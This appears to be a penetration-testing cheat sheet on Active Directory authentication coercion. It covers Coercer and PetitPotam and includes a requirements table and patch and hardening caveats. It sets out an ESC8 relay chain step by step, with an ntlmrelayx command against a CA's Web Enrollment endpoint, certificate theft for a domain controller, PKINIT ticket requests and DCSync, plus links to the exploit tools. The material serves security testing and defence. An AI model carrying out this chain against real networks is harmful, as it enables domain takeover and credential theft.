Authentication Coercion
Multi-Method
Coercer (https://github.com/p0dalirius/Coercer) automates coercion by trying a dozen different RPC methods (MS-EFSR, MS-RPRN, MS-DFSNM, MS-FSRVP and others) against a target in a single run, so it is the quickest way to find out which coercion primitives a host still exposes. PetitPotam below is the single-method (MS-EFSRPC) variant.
PetitPotam (MS-EFSRPC)
Attack requirements
| Feature / Component | Required for PetitPotam coercion | Required for full relay to DA via AD CS (ESC8) |
|---|---|---|
| EFSRPC reachable on the target (efsrpc / lsarpc pipe) | ✅ Yes | ✅ Yes |
| NTLM enabled (not blocked by policy) | ✅ Yes | ✅ Yes |
| SMB/LDAP signing disabled | ❌ No (coercion itself is unaffected) | ❌ No (the relay target is HTTP; only matters if you relay to SMB or LDAP instead) |
| AD CS with Web Enrollment (certsrv) installed | ❌ No | ✅ Yes |
| Client-auth template the relayed machine account can enroll in (e.g. DomainController, Machine) | ❌ No | ✅ Yes |
| EPA / channel binding off and certsrv reachable over plain HTTP | ❌ No | ✅ Yes |
Caveat: the unauthenticated EfsRpcOpenFileRaw trigger was patched in August 2021 (CVE-2021-36942); on patched hosts PetitPotam still works with any valid domain credential. Microsoft's ESC8 hardening (KB5005413) is to require HTTPS with EPA on the Web Enrollment endpoint or to disable NTLM on it entirely.
Identify
Exploit
PetitPotam (Python): https://github.com/topotam/PetitPotam
Invoke-Petitpotam (PowerShell port): https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-Petitpotam.ps1
Start ntlmrelayx first, pointed at the CA's Web Enrollment endpoint; the DomainController template is used because the coerced account will be the DC's machine account:
sudo ntlmrelayx.py -debug -smb2support --target http://CA01.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
Then trigger PetitPotam against the DC with the attacker IP as the listener; the DC authenticates to ntlmrelayx over SMB and that NTLM exchange is relayed to certsrv.
On success ntlmrelayx reports GOT CERTIFICATE! and prints a base64-encoded PKCS#12 (the DC machine account's certificate and private key).
Next, feed that certificate to gettgtpkinit.py from PKINITtools to request a Ticket-Granting-Ticket (TGT) for the DC machine account (DC01$) via PKINIT. Keep the AS-REP encryption key it prints: getnthash.py needs it to recover the account's NT hash, and either the TGT or the hash is enough to DCSync with secretsdump.py.
https://github.com/dirkjanm/PKINITtools.git